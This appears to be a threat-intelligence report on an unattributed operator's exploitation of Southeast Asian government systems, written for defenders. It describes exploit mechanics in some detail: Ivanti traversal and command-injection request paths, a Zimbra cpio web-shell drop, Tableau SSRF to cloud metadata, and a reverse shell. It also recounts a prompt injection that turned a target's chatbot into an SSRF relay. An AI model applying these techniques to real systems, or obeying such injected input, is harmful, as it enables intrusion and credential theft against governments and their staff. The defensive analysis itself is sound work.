THE HUNTER’S LEDGER
Government Exploitation Toolkit · August 13, 2026

The Middle Tier: A Non-APT Operator's Reach Into Four Southeast Asian Governments

Contents

Campaign Identifier: SEAsia-Gov-Exploitation-Toolkit-144.172.106.236
Last Updated: August 13, 2026
Threat Level: HIGH

Acknowledgment: Recovery of the MHESI ministry compromise (Section 5.4) drew on file content surfaced through Hunt.io’s AttackCapture platform.

1. Operational Brief

The thing worth your attention here is not the toolkit. It is who was holding it. Four Southeast Asian governments were targeted from a single rented server, three of them compromised, and the operator behind it does not look like an APT. No state fingerprints, no tracked-actor tooling, none of the track-covering you see from a group that knows it is being hunted.

This is a tier I never used to think much about. Not nation-state, not commodity crime, an in-between operator, closer to a cyber-mercenary, reaching into government targets because in this corner of the internet almost nobody is looking. The exposed box sat open to anyone for about a month before we found it.

An operator can squat in a space like this and finish the job long before anyone notices, and that, to me, is the real story. A capable-enough operator got further into four national governments than it had any business getting, and none of it had ever been public. No prior reporting names this operator, its infrastructure, its toolkit, or any of its victims, so the campaign and the controls that blunted it are both documented here for the first time.

Three compromises have evidence physically in hand: Indonesia’s Attorney General document system (Kejaksaan/SIPEDE, 11 correspondence PDFs exfiltrated), a Philippine government science-academy host (svr1.nast.ph, authenticated administrator access), and a private Thai web host. A fourth, Thailand’s Ministry of Higher Education (MHESI), is a probable compromise at MODERATE-HIGH confidence, evidenced by the operator’s own captured validation logs rather than by data we recovered. Everything else the toolkit reached for across Indonesia, Thailand, Malaysia, and the Philippines, including the Thai military mail and army systems, was attempted and did not land. The operator holds credentials for far more than it ever proved it could use.

What actually stopped this operator is the useful part of the case, and it is more sobering than reassuring. One-time passwords held the national archives. A patched Exchange estate turned a historically devastating exploit into a wall of error codes at the Thai air force. Account lockout beat the brute force at a state aircraft maker.

These are ordinary controls, and they are the only reason this was a partial breach instead of a clean sweep of four governments. Turn it around and it is unsettling. An operator this ordinary, with a few tweaks and better recon, could have cracked wide open some of the most protected organizations there are. They were that close.

The lesson is the unglamorous one that keeps proving true. Defense in depth and limiting blast radius do more of the real work here than perimeter prevention. It is not only about keeping people out, it is about how little they can reach once they are in.

The actor stays unattributed. No operator identity artifact was recovered, and no credible technical evidence links this activity to any publicly named threat actor. The two closest publicly tracked Southeast Asian government-targeting actors were checked and positively excluded on every dimension. It is a coherent, distinctive, trackable cluster all the same, so it carries the internal designation UTA-2026-018 (an internal tracking label used by The Hunters Ledger, see the Threat Actor Assessment in Section 10). My own read on the operator, kept separate from the formal attribution, is a resource-constrained but capable individual who is out of their depth against real government targets; the evidence for that actor-type read is in Section 10.2. Naming a specific actor is INSUFFICIENT, and I make no nationality, jurisdiction, or sponsorship claim.

A separate and urgent finding rides along with this one. When the operator’s evidence was captured, the compromised Philippine host svr1.nast.ph was also carrying a GSocket/THC backdoor kit, five malicious cron entries and four daemon-masquerading implants loaded from localroot[.]sbs. It is MODERATE-likely the work of a second, unrelated intruder who was already inside before this operator arrived. One actor’s compromise surfacing out of another’s is rare, and the two are kept strictly apart throughout this report (Section 7). For remediation the distinction does not matter, because operating-system-level persistence on a government server comes off regardless of who planted it, and on that host it was the most immediately actionable item found.

Threat level: HIGH

Rated on confirmed outcomes rather than toolkit breadth. That means government document theft (11 correspondence PDFs from an Attorney General office), authenticated administrator access on a government host, ministry access evidenced by the operator’s own logs, credential possession spanning four countries’ government estates, and a working n-day capability against widely deployed edge products. It is HIGH rather than CRITICAL because the demonstrated reach was far narrower than the toolkit implies, the command-and-control estate was near-silent (one victim callback in two weeks), and the open directory that exposed the operation was pulled in early July 2026. The four national CERTs (Indonesia, Thailand, Malaysia, and the Philippines) were notified before publication.

What to do first

If you defend a government estate in the region, work outside-in, sweeping the operator’s outward-facing indicators first (the VPS IP and the durable operator anchors), then narrowing to the direct host indicators. In priority order:

  • Hunt the cron persistence and the highest-value operator signatures, not live C2. The Zimbra web-shell banner Zimbra Security Monitor v3.1 -- System Diagnostics and the second-actor cron implants on svr1.nast.ph are durable and worth the time; the six-service C2 estate phoned home exactly once in two weeks, so chasing live beacons is wasted effort.
  • Reset every credential the operator is confirmed or assessed to hold, across all four countries. Possession is broad even where proven use is narrow, and a credential stays valid until it is rotated.
  • Check for and remove GSocket implants of this shape, and block the second-actor loader domain and hashes at the perimeter.

The complete, validated indicators and detection logic ship as separate deliverables: an IOC feed and a full detection package. This report references them rather than embedding them.


2. Campaign Reach and Risk Assessment

Section 1 gave the verdict; this section is the scoreboard behind it, what the operator actually achieved versus what it merely attempted. Because the operator archived its own logs, cookie jars, response dumps, and stolen documents in the same world-readable directory, that scoreboard rests on the operator’s own captured evidence rather than on our inference.

Here is what fell, confirmed with evidence in hand.

# Victim Country Evidence class Confidence
1 Kejaksaan / SIPEDE (Attorney General’s Office) Indonesia 11 unique correspondence PDFs exfiltrated (~17.1 MiB), loot in hand HIGH
2 svr1.nast.ph (NAST / DOST science academy) Philippines Authenticated Webmin 2.641 admin pages rendered, read-broad but write-limited HIGH
3 WordPress @ 119.59.99[.]87 (private host, NOT a government system) Thailand Interactive bash shell captured HIGH
4 MHESI (Ministry of Higher Education, Science, Research & Innovation) Thailand Operator’s own validation log: authenticated VPN (×3 accounts) + EMPLOY (SUCCESS) + uniconsubmission (200→302) MODERATE-HIGH

What held is the more useful half, and each one shows positive evidence of non-success. The national archives (SRIKANDI/ANRI, a one-time-password challenge appears to have stopped the operator), Thai military mail (RTAF/RTARF, every Exchange ProxyLogon probe rejected), a district court’s Joomla portal (single-password spray failed; no web shell was deployed on any government host anywhere in the campaign), a state aircraft manufacturer’s e-procurement (brute-force lockout), the Royal Thai Army’s SSH (connection refused), and all five targeted Malaysian systems (no compromise evidenced at all). The operator possesses credentials for many of these systems; validity is unproven for nearly every one. Section 8 examines the specific controls that produced these rejections, because they are the rare, reader-useful output of a case like this.

The reach is far narrower than the toolkit implies. A toolkit built for whole-of-government exploitation across four countries, wielded by an operator with real reverse-engineering skill, produced three compromises with loot, panel, or shell in hand, one further government compromise evidenced one notch lower, and a command-and-control estate that phoned home exactly once in two weeks. For all of it, very little converted into actual access.

2.1 Risk scoring

The overall risk score is 7.1 / 10 (HIGH), and it drives the Threat Level at the top of this report. The rating is anchored to confirmed outcomes, not the toolkit’s breadth.

Full risk scoring: the per-dimension breakdown behind the 7.1
Risk DimensionScore (X/10)Rationale
Data Exfiltration8/10Confirmed theft of 11 Attorney-General correspondence PDFs (some in executed/"Signed" state) plus harvested VPN session cookies and broad credential possession across four national government estates.
System Compromise8/10Authenticated administrator access on a government host, authenticated ministry VPN and web-system access (MODERATE-HIGH), and a working unauthenticated n-day capability against five widely deployed edge products.
Persistence Difficulty7/10SSH authorized-key injection tooling and a staged Zimbra web-shell weapon; the co-located second-actor GSocket kit is live OS-level persistence on the shared government host. The operator's own cron-write attempts, however, bounced.
Evasion Capability7/10Bespoke, VirusTotal-unknown scripts evade signature detection; layered public anonymization (free VPN, DPI-resistant proxy, SSH-tunnel relay) defeats IP blocklisting; GIF89a-polyglot PHP web shells hide payloads behind valid image magic bytes.
Lateral Movement6/10Full tunnel, SOCKS5, and multi-hop-proxy capability built and running, but never used to carry victim traffic. Capability is HIGH; demonstrated movement is absent.
Detection Challenge6/10Bespoke tooling with no antivirus family coverage raises the signature bar, but sloppy operational security (world-open directory, plaintext artifacts) and a barely-used C2 estate lower the practical difficulty of catching the activity.

That weights out at 7.1 / 10, which is HIGH. The dominant contributors are confirmed data exfiltration and confirmed authenticated system compromise. The score sits below CRITICAL because the demonstrated reach is narrow, lateral movement never occurred, and the exposed infrastructure was withdrawn.

What the operator can reach is official government correspondence, civil-servant and administrator credentials, and VPN and session material across national tax, treasury, health and law-enforcement systems. For anyone affected that means unauthorized access to internal correspondence and services, lateral pivoting off harvested credentials, and, on the Philippine host, live operating-system persistence still waiting to be removed.

Rotate every named account the operator holds, whether or not each individual login was independently proven. A credential stays valid until somebody rotates it.


3. Toolkit Classification and Components

This is not a single malware family. It is the complete working toolkit of one hands-on-keyboard operator, recovered because the operator left its staging directory world-readable on a rented server. That distinction shapes everything downstream. There is no self-propagating binary to reverse, no packer to strip, and no builder to fingerprint. Instead there are 99 plain-text scripts, a handful of compiled tunnels, and, most valuable of all, the operator’s own captured results. The full methodology is reconstructable from source rather than inferred from behavior.

Attribute Assessment
Type Operator exploitation and staging toolkit (hands-on-keyboard offensive tooling), not a malware family
Primary family None. The exploitation scripts are bespoke and unknown to VirusTotal; the only family-classified binary is commodity chisel (Hacktool.Chisel)
Components 100+ bespoke Python/shell n-day and brute-force scripts; commodity chisel.exe tunnel; a self-built Go multi-agent tunnel and SOCKS5 stack (tunnel-server / tunnel-agent); THC-Hydra v9.5; the Acunetix scanner; a Zimbra CVE-2022-41352 cpio weapon; a credential-phishing server; minimal PHP/JSP web shells
Family confidence HIGH that the toolkit is bespoke operator code (unknown to VirusTotal, hand-written, iteratively versioned); HIGH that chisel is an off-the-shelf commodity build
Sophistication Intermediate, capable but operationally sloppy. Genuine skill (mobile-API cryptographic reverse-engineering, a self-authored Go tunnel, nine-CVE n-day chains) paired with poor operational security (a world-open directory, plaintext artifacts, /tmp staging, an unauthenticated no-TLS SOCKS5 proxy exposed to the public internet)
Threat category Government intelligence collection and access development: document theft plus credential harvesting, cyber-espionage-flavoured
Campaign complexity Multi-tool, single-operator; whole-of-government targeting in Indonesia specifically, narrower target sets in Thailand, Malaysia, and the Philippines

3.1 The recovered corpus

The corpus spans 99 exploitation and automation scripts, 92 in Python and 7 in shell, one Windows executable, two Linux tunnel binaries, credential and wordlist text files, a Zimbra cpio weapon, minimal PHP and JSP web-shell payloads, and a large body of captured HTML, cookie, and log outcome artifacts. None of the operator binaries are packed, the Go binaries carry an entropy near 6.2, and the scripts are plain source text. A spot-check confirmed the bespoke scripts are unknown to VirusTotal; for hand-written per-target tooling, that absence of any prior record is itself the finding.

Full binary inventory: the durable static anchors and the four load-bearing files

The four load-bearing binaries and their roles:

File Type Role
chisel.exe PE32+ Go (9.31 MB) Commodity Chisel tunnel. Shared by 179 VirusTotal submitters since 2024-10-07, off-the-shelf, not operator-unique. Its hash is worthless for attribution and its VirusTotal relationships are shared-tool noise.
tunnel-server ELF64 Go (6.37 MB) Self-built multi-agent reverse-tunnel and SOCKS5 server. Internal Go module tunnel-proxy/pkg/mux. Not packed.
tunnel-agent ELF64 Go (5.17 MB) Paired agent, same self-authored module family.
cat.sh (second actor) Shell script (80.48 KB) GSocket/THC backdoor loader. Belongs to the separate second-actor finding (Section 7), not to this operator. Served from localroot[.]sbs.

The durable, attribution-grade static anchors are therefore not the commodity chisel hash but the operator-generated fingerprints described in Section 4.7 and inventoried in Section 13, meaning two chisel server-key fingerprints, the operator’s SSH host-key and authorized-key set, the custom Go tunnel module string, and the operator-authored Zimbra web-shell banner. Those survive an IP change; a shared commodity hash does not.


4. Technical Analysis: The Exploitation Toolkit

The operator’s code shows capability and intent. Whether each capability actually produced a compromise is a separate question, adjudicated in Section 5 against captured outcomes. The two are not the same, and a script, a comment, or an optimistic print() in a success branch is intent, never achievement.

It carried working exploit chains for nine known vulnerabilities across five widely deployed edge products, the Ivanti Connect Secure VPN, Tableau, Zimbra mail, Moodle, and Microsoft Exchange. The standout piece of genuine skill was cryptographic reverse-engineering of Indonesia’s national-archive mobile app, rebuilding its encrypted API by hand to talk to the server directly. Around that sat credential-replay tooling that reached across the whole Indonesian government estate, tax, civil service, health, customs, licensing, and more, plus a self-built Go tunnel stack for moving in and out of victim networks. The mechanics of each are collapsed below for anyone who wants that depth.

Full teardown: the CVE-by-CVE exploitation mechanics, 4.1 to 4.7

4.1 The nine n-day CVEs

The operator’s code references nine CVE identifiers across five edge-facing product families. Seven map cleanly to their stated products; two do not, and one further identifier is fabricated. The table records what the code targets and, critically, the outcome the operator’s own captures show.

CVE(s) Product Target(s) Outcome per captured evidence
CVE-2023-46805 + CVE-2024-21887 Ivanti Connect Secure vpn.mhesi.go.th Chain in code; MHESI VPN access evidenced by the operator’s validation log (Section 5)
CVE-2022-41352 Zimbra (Amavis cpio) mailweb.lemhannas.go.id Weapon in hand (7-path cpio); delivery attempted, success unconfirmed
CVE-2020-25627 / -25629 / -25630 Moodle (XSS / privilege escalation / unauth LFI) RTAF e-learning and other education platforms Referenced in code; only anonymous session cookies captured, no exploitation evidenced
CVE-2021-26855 (ProxyLogon) Microsoft Exchange mail.rtaf.mi.th, mail.rtarf.mi.th Confirmed by technique; attempt FAILED: every probe rejected 411/400/404/401
CVE-2024-28149 + CVE-2024-51758 Labelled “Tableau” by the operator rbreport(dev).mhesi.go.th Technique observed (SSRF / SAML); CVE labels do not correspond to Tableau, see 4.3

Three of these families (Ivanti, the Zimbra cpio flaw, and ProxyLogon) carry independently documented histories of mass, indiscriminate in-the-wild exploitation by unrelated threat actors, and all sit in the U.S. CISA Known Exploited Vulnerabilities catalog. That standing history, not this operator, is why any exposed government estate on those products is a perennial target; Section 9 provides that context. The Moodle trio, by contrast, carries no KEV listing and no public exploitation reporting, consistent with the operator’s own null result against Moodle targets.

Exclusion: a fabricated CVE. CVE-2026-68645 appears in the toolkit only as a fake “security patch” string inside the phish_server.py lure page. It is not a real vulnerability and is excluded from the CVE set and the IOC feed. It is called out here so a reader who encounters the string in phishing content does not chase a non-existent flaw.

4.2 The Ivanti Connect Secure chain

The exploit_ivanti.py and _v2.py scripts implement the canonical Ivanti unauthenticated remote-code-execution chain against vpn.mhesi.go.th. The first stage abuses CVE-2023-46805, an authentication-bypass path traversal, by requesting /api/v1/totp/user-backup-code/../../system/system-information, where the ../../ walks out of the loosely protected TOTP endpoint into an administrative one that should require a session. The second stage chains CVE-2024-21887, a command injection, through /api/v1/cac/status?id=$(...), where the $(...) shell-substitution payload executes at appliance privilege.

The _v2 variant is the more consequential one. Rather than only proving the vulnerability, it authenticates to the MHESI VPN with three named accounts, harvests the DSID session cookie each login returns, and writes the cookies to /tmp/vpn_cookies.txt. This is the difference between a proof-of-concept and an access tool, because the script is built to collect and reuse live sessions. Section 5 shows this is exactly the target where the operator’s own validation log records authenticated VPN success.

The consequence worth flagging is the DSID cookies. Unauthenticated code execution on an edge VPN gateway is a foothold on the device that brokers remote access for the whole organization, not one desktop, and the DSID cookies harvested here are reusable authenticated sessions that can outlive a password change. A reset alone does not close that door on the MHESI gateway, the live sessions have to be killed too.

The operator's Ivanti exploit script header showing the CVE-2023-46805 and CVE-2024-21887 chain against the target vpn.mhesi.go.th.
Figure 1: The operator's Ivanti Connect Secure exploit script, chaining CVE-2023-46805 (authentication-bypass path traversal) and CVE-2024-21887 (command injection) against the MHESI ministry VPN gateway. This is exploitation capability aimed at an edge appliance, not a confirmed compromise of it.

4.3 Tableau: SSRF and SAML, and a CVE-labelling discrepancy worth recording

The auto_exploit.py and autonomous_2h.sh runner drive a two-hour automated loop against the MHESI ecosystem plus GISTDA, Thailand’s space agency, working through the ministry’s open-data portal (CKAN at data.mhesi.go.th, probed with datastore SQL injection and SSRF), its document system, and its GenAI chatbot along the way. Two of its techniques target Tableau Server at rbreport(dev).mhesi.go.th:

  • Server-side request forgery (SSRF) through Tableau’s vizportal API: getViewThumbnail?url= and fetchBinary?url= are coerced into fetching the cloud instance-metadata endpoint at 169.254.169.254/latest/meta-data/, the standard technique for stealing a cloud host’s temporary credentials from the inside.
  • A SAML site-takeover technique aimed at authenticating as an arbitrary Tableau site user.

The operator labels these CVE-2024-28149 and CVE-2024-51758. Those identifiers do not correspond to Tableau in public CVE records: CVE-2024-28149 is a stored-XSS flaw in the Jenkins HTML Publisher Plugin, and CVE-2024-51758 is an insecure-storage issue in the Filament PHP admin-panel framework, two entirely unrelated products, neither referencing Tableau, SSRF, or SAML. The closest genuine match for the SAML technique is the much older CVE-2020-6939 (Tableau site-specific SAML account takeover); the SSRF-to-metadata technique matches a February 2024 researcher disclosure that was never assigned a CVE at all.

This report therefore describes the Tableau activity by its observed technique (vizportal SSRF to cloud metadata, and SAML site takeover) rather than by the operator’s CVE labels, which do not survive verification. The discrepancy is a small but genuine detail of the operator’s tradecraft, since the CVE numbers were transcribed loosely, a data point consistent with the broader capable-but-sloppy profile. It also carries a defender lesson. Do not scope Tableau exposure by chasing CVE-2024-28149; scope it by the SSRF and SAML behaviors.

The volume and uniformity of the 99 scripts, together with those confidently-formatted but wrong CVE labels, read to me like LLM-assisted development, common enough in tooling like this by now. I cannot confirm or rule it out from the evidence, and by 2026 AI coding help is so widespread that it barely separates one actor from another, so I note it and leave it out of the attribution weighing in Section 10.

The same loop carries the technique I found most interesting, though not for the reason it first looks. A chatbot on the target estate is coerced, through prompt injection, into acting as an SSRF relay to the cloud-metadata endpoint. The point is not that it is an AI chatbot; nearly all of them are now, so that part is not the headline.

The point is that chatbot traffic is the kind of thing defenders wave through. I have chased plenty of “why did this host reach that odd domain” alerts to ground, and they are almost always benign chatbot backend plumbing, so a lot of teams see that alert and move on. An operator relaying internal requests through exactly that dismissed-as-noise channel is betting on the reflex, and that bet is the real technique here.

It has no clean MITRE ATT&CK technique of its own, so it is captured by its outcome, cloud-metadata credential theft. Lesser-known rather than first-of-its-kind; a prior-art search is warranted before any “first observed” framing.

4.4 The Zimbra delivery weapon

The deliver.py script pairs a spoofed email with a weaponized cpio archive (exploit.cpio, 5,144 bytes, “new ASCII” format, magic 070701) aimed at mailweb.lemhannas.go.id, the mail server of Lemhannas, Indonesia’s National Resilience Institute. The email pretexts as security-monitor@tni[.]mil[.]id (a spoofed Armed Forces sender) to make a malicious “security update” attachment look routine.

The dangerous part is that nobody has to open anything. Zimbra’s Amavis scanner unpacks the attachment on its own just to check it for malware, and on a vulnerable build that unpack is the exploit, so the server infects itself the moment the message lands. The flaw is CVE-2022-41352, where Amavis falls back to the cpio utility to extract archive attachments and cpio does not sanitize path-traversal sequences. The archive contains seven members, each prefixed with ../../../../../../../ so that extraction escapes the scanning sandbox and drops a JSP web shell (a page that calls Runtime.getRuntime().exec(...) to run operating-system commands) into a different candidate Zimbra web root. Seven paths cover the plausible install layouts (/opt/zimbra/jetty/, /opt/zimbra/mailboxd/, and version-specific jetty-distribution directories); the full drop-path list is inventoried in the IOC feed for hunting.

Every copy embeds the decoy banner Zimbra Security Monitor v3.1 -- System Diagnostics. That string is the single highest-value hunting artifact in the whole case. It is operator-authored, has zero legitimate use, appears in every cpio member and any dropped shell.jsp, and ties the web shell directly to the phishing lure’s branding and the spoofed security-monitor@tni.mil.id sender. Delivery was attempted; whether any of the seven drops landed is unconfirmed (Section 5), which is precisely why the drop paths and the banner string are worth hunting on any Zimbra estate in the region.

A JSP web shell carved from the operator's exploit.cpio archive, showing the decoy banner 'Zimbra Security Monitor v3.1 -- System Diagnostics' above a Runtime.getRuntime().exec() call.
Figure 2: The JSP web shell inside the operator's Zimbra weapon (CVE-2022-41352), carrying the operator-authored decoy banner "Zimbra Security Monitor v3.1 -- System Diagnostics" above its command-execution call. Delivery to the Lemhannas mail server was attempted; whether any of the seven traversal drops landed is unconfirmed. The banner is the string to hunt on.

4.5 SRIKANDI: genuine mobile-API cryptographic reverse-engineering

The largest single cluster in the toolkit (24 sri_* scripts) targets SRIKANDI, Indonesia’s national archival system (srikandi.arsip.go.id / api.arsip.go.id), operated by the national archives agency ANRI. The standout capability here is genuine. The operator extracted the app’s own AES keys (AES-128-ECB for requests, AES-CBC for responses) from a 1.7 MB JavaScript bundle (sri.js), then rebuilt the encrypted request format to speak the API directly.

This is the finding that moved my read of the operator. Going in, I had them pegged as opportunistic, 99 AI-assembled scripts thrown at government targets with a few landing by luck. Hand-extracting the app’s own AES keys from its JavaScript and rebuilding the encrypted request format is not luck. It is someone with a plan who can improvise when a target does not behave, the on-the-fly pivoting a lower-skilled actor never manages because they do not understand the system well enough to try. It raised my estimate of them, and the fact that the whole effort still died on an OTP prompt does not lower it. The skill was real; the target was simply better.

Yet the same cluster reads unmistakably as a debugging campaign that never closed, with five different format guesses at a single create-user endpoint (sri_try_create.py), one-time-password brute-forcing of the obvious 123456 and 000000 values (sri_otp.py), and 403/401 handling branches scattered throughout. As Section 5 documents, no SRIKANDI response, token, cookie, or document appears anywhere in the capture, and one of the operator’s own scripts shows a 202 OTP challenge firing even against the account it believed it had backdoored.

A closely related but separate cluster (sipede_*, sri_mobile_sipede.py) handles the Attorney-General document harvest, and the operator’s own code proves SRIKANDI and SIPEDE are distinct systems with distinct authentication, because the SRIKANDI AES key does not appear in the SIPEDE script. That separation matters for the compromise verdict. SIPEDE fell, SRIKANDI did not, and the two must not be blurred.

4.6 Whole-of-government credential replay

A large family of scripts (top_targets.py, batch_login.py, keycloak_lan.py, siasn_lpse.py, sipd_ahu_insw.py, oss_sikap.py, mail_bpjs.py, djp_login.py, and more) replays possessed credentials across the Indonesian government estate, reaching tax (DJP), treasury (SAKTI/SPAN), civil service (SIASN/BKN), procurement (LKPP), trade and licensing (OSS), law and customs (AHU/INSW), health (BPJS/SATUSEHAT), and regional systems. The scripts speak the right protocols for each, with Keycloak OIDC password grant, CAS ticket, NextAuth/JWKS, and Zimbra SOAP AuthRequest, which is what makes the credential possession credible as a capability.

Full per-system inventory: which government systems the operator holds credentials or a login path for, and how each authenticates

Read every row as possession or a probe, not proven access. Section 5 holds the confirmed compromises; for the systems below, validity is unverified.

System Agency / country What the operator holds Auth path
djponline.pajak.go.id Indonesia, DJP tax authority Possessed NPWP taxpayer credentials Form login
sso-siasn.bkn.go.id, swajar-asnpintar.lan.go.id Indonesia, SIASN civil service (BKN) + LAN Possessed NIP credentials Keycloak OIDC password grant, CAS ticket, JWT
lpse.kemendag.go.id Indonesia, Ministry of Trade e-procurement Possessed credentials eProc login
data.bpjs-kesehatan.go.id, edabu.bpjs-kesehatan.go.id Indonesia, BPJS national health insurance Portal probing Health-data portal
webmail.semarangkab.go.id, mail.gorontaloprov.go.id Indonesia, provincial / municipal government email Possessed mailbox credentials Zimbra SOAP AuthRequest
ui-login.oss.go.id, sikap.lkpp.go.id Indonesia, OSS business licensing + LKPP procurement Possessed credentials API / form login
sipd-ri.kemendagri.go.id Indonesia, Home Affairs regional finance (SIPD) Possessed NIP credentials Login
elayanan.ahu.go.id Indonesia, Ministry of Law legal-entity admin (AHU) Login enumeration not observed
sso.insw.go.id Indonesia, National Single Window (customs / trade) Possessed credentials NextAuth / Keycloak callback + JWKS
immigration.gov.ph Philippines, Bureau of Immigration Unauthenticated WordPress-plugin probing Elementor / ElementsKit REST abuse

One structural finding tempers the picture, and it is important for calibrating alarm. top_targets.py, which at first glance looks like the operator’s master credential database, never actually submits its credentials. It performs a GET request and scrapes the login form, so it is a form-mapper and not a validator.

Across the credential-replay family, the operator possesses many credentials but proved very few. This is why I treat broad credential possession as a reset-worthy exposure, meaning every named account should be rotated, while declining to describe most of those systems as compromised. Possession is not proof of a working login.

Catching that also sharpened my read of what the operation was for. The pattern across the toolkit is collect, not break. Scrape credentials, pull documents, hold access, feed the next move. Not credentials harvested for resale, and not a loud operation built to disrupt a government. It reads as intelligence collection, a read rather than a proven motive, and it lines up with everything else about how this operator worked.

The contents of thai_mil_pass.txt, a list of single-token password guesses such as password, rta2024, RTA@2025, and speed.rta.mi.th, with no username-and-password pairs.
Figure 3: The file labelled a "Thai military password file" is a brute-force guess list, not stolen credentials: every line is a single candidate password (common defaults plus target-themed guesses), with no user:pass pairs anywhere. It evidences targeting, not captured credentials.

4.7 The tunnel stack and the durable operator anchors

The operator ran two tunneling capabilities in parallel. The first is commodity, chisel.exe, an off-the-shelf HTTP-over-WebSocket tunnel. The second is bespoke, a self-authored Go stack (tunnel-server / tunnel-agent) built around the internal module tunnel-proxy/pkg/mux, exposing a control channel on :9443 and a SOCKS5 proxy on :1080, with no authentication and no TLS.

That last detail, an open, unauthenticated SOCKS5 proxy on the public internet, sits on the careless side of this operator. The tunneling choices do too. They wrote their own Go stack, then also grabbed Chisel straight from the source and ran it as-is. That off-the-shelf floor, used without a second thought, is part of why I did not read this as a top-tier actor even with the bespoke work sitting on top of it.

Because the commodity chisel hash is shared by 179 unrelated submitters, it is useless for recognizing this operator. The durable, operator-unique anchors are elsewhere, and they are what defenders should watch for reuse:

  • Two chisel server-key fingerprints: yW2X8fCVTmfMSpVyrhZQGkSTCfBJBMSyQtgPzCMCfuw= (:8443) and rEVojNCdmii9193KJQL0CQdIcudwm3RW32BKJlUgLT4= (:4443, used for reverse tunnelling). These are operator-generated and survive an IP change.
  • The operator SSH host-key set on 144.172.106[.]236 (ED25519 84FDB939…23B7, RSA 55F5EE6E…52FA, ECDSA B78E7D40…7D1F), unique to this box in the corpus checked.
  • The operator SSH authorized-key fingerprint SHA256:b2sH9INFA/+b9jwMiiTmJoNFaC6SuKI3zc+SDgsBGCE (from a Redis-unauthenticated SSH-key injection keypair, comment root@ubuntu-Utah-1gb), worth hunting in the authorized_keys file of any host, because its presence is a backdoor SSH grant.
  • The custom Go tunnel module string tunnel-proxy/pkg/mux, embedded in both ELF binaries.
  • The Zimbra web-shell banner from Section 4.4.

These anchors, not the commodity hash, are the spine of the detection and hunting guidance in Section 14 and the IOC feed in Section 13.


5. Confirmed Compromises: What the Captured Outcomes Prove

The rule for this section is strict. I only call something a compromise where a captured outcome backs it, a response, a session, a cookie, a rendered authenticated page, or stolen data in hand. A script, a comment, or a hopeful success message is intent, never proof.

I learned to hold that line the hard way on this one. Several things I first wrote down as confirmed were nothing of the sort. BACKDOOR ACTIVE turned out to be a print() line sitting in a success branch that never ran, and what I first read as an OTP bypass was the OTP doing its job and stopping the operator cold.

Both tells sat near the end of scripts I had stopped reading once I thought I understood them. The lesson stuck, and it was to read the whole sample, not the filename and the first half. It is why every verdict below is adjudicated against a captured outcome.

5.1 Kejaksaan / SIPEDE (Indonesia): HIGH, document exfiltration

The most serious finding is also the most unambiguous, because the loot is physically in the capture. The directory contains sipede_docs/: 12 PDF files, 11 of them unique (one duplicate pair, byte-identical), totalling 17,973,103 bytes, of outgoing correspondence and internal memoranda from the Attorney General’s Office correspondence system (sk_Nota_Dinas_*, sk_Biasa_Internal__Eksternal_*, several in a “Signed”/executed state). PDF creation metadata spans 2026-01-23 to 2026-06-10, all stamped +07'00' Western Indonesia Time. A companion cookie jar holds a genuine Laravel session (XSRF-TOKEN plus sipede_session).

A failed request does not produce documents, so the loot settles it. This is confirmed collection against a national law-enforcement body, and it has the shape of espionage rather than theft for resale.

One caveat makes the exposure bigger rather than smaller. The operator’s own sri_mobile_sipede.py carries the comment “Try surat keluar preview for ALL 13 docs” while only 11 or 12 are in hand, so at least one targeted document is unaccounted for. The victim’s real exposure may be slightly wider than what was recovered.

The operator's script enumerating the Attorney-General letter repositories, listing incoming, outgoing-archive, personal, and all-outgoing letter endpoints after authenticating.
Figure 4: After authenticating to the Attorney-General's correspondence system (Kejaksaan / SIPEDE), the operator's script enumerates the letter repositories (incoming, outgoing-archive, personal, all-outgoing). Eleven unique documents were exfiltrated: the one compromise in this campaign where the stolen data is physically in hand.

5.2 svr1.nast.ph (Philippines): HIGH, authenticated admin, read-broad but write-limited

The operator got a real console here, not a login page. wm_dash.html and wm_full.html render the fully loaded, authenticated Webmin 2.641 interface with Authentic-Theme, Virtualmin and Cloudmin, and a run of authenticated admin sub-pages follows it (filemin.html, summary.html, scripts_list.html, editweb.html, php_ini.html), all backed by a live Webmin sid session cookie. Administrative read access to a government host is confirmed.

The precise scope matters, and it is narrower than “admin access” alone implies. The access was read-broad but write-limited. The create/edit attempts (cron_create.html, cron_edit.html) are titled “Login to Webmin” (they bounced back to the login form), and the command-execution attempts (wm_shell.html, xt.html, shell.html) returned module error pages. No command execution and no cron persistence by this operator is evidenced on the host. This distinction is essential for Section 7. The live cron implants found on the very same host are a separate actor’s, because this operator’s own writes did not take.

5.3 WordPress at 119.59.99[.]87 (Thailand, private host): HIGH, interactive shell

Three logs (revshell.log and two siblings) capture an interactive bash prompt reaching out from 119.59.99[.]87 to the operator’s ncat listener on TCP/4444, from inside a disguised wp-content/plugins/system-health-monitor/ plugin directory; five further connections from the same source are banner-only. This is a genuine interactive shell, but the host is a private WordPress server, not a government system. It is included as a confirmed compromise for completeness and because it is the only host that ever contacted the operator’s C2 infrastructure (Section 6), but it does not extend the government-victim count.

5.4 MHESI (Thailand): MODERATE-HIGH, from the operator’s own validation log

The operator’s credential-validation output (creds_result.txt and creds_result2.txt) records real HTTP outcomes against MHESI, the Ministry of Higher Education, Science, Research and Innovation:

  • VPN, authenticated, three accounts, each returning HTTP 200 with multi-kilobyte session bodies flagged AUTH PATTERN.
  • EMPLOY (a named account): an explicit → SUCCESS with a 26,690-byte response.
  • uniconsubmission (a named account): HTTP 200→302, the canonical redirect-away-from-login success signature.
  • rbportal / Kong gateway, rejected ({"error":"invalid_grant","error_description":"Invalid user credentials"}). A control that held, named in Section 8.

The evidence here is the operator’s captured result (real status codes, real response sizes, a redirect signature, and a live-versus-dead differential proving the tool measured genuine outcomes), not a hardcoded string. It sits at MODERATE-HIGH rather than DEFINITE because the authenticated session content, the post-login HTML dumps themselves, never made it into the capture and cannot be recovered by any means left to us. That gap is permanent, not a deferred analysis step. The defensible statement is that the operator achieved authenticated access to the MHESI VPN and at least the EMPLOY web system (very likely uniconsubmission as well), while the rbportal/Kong gateway rejected them.

5.5 Attempted-and-unproven or attempted-and-failed

These are the marquee targets whose earlier “confirmed” readings were reversed against captured outcomes. They remain worth detecting as attacker behavior, but none may be described as a compromise. They are also, collectively, the evidence base for Section 8’s controls-that-held analysis.

Target What was attempted Outcome artifact showing non-success
SRIKANDI / ANRI (national archives) Admin login, backdoor-account creation, OTP brute (123456/000000), document read (24 sri_* scripts) No SRIKANDI response, token, cookie, or document anywhere in the capture. “BACKDOOR ACTIVE” is a print() in a success branch, not output; a 202 OTP challenge fires even on the supposedly created account. Their 2FA appears to be what stopped the operator.
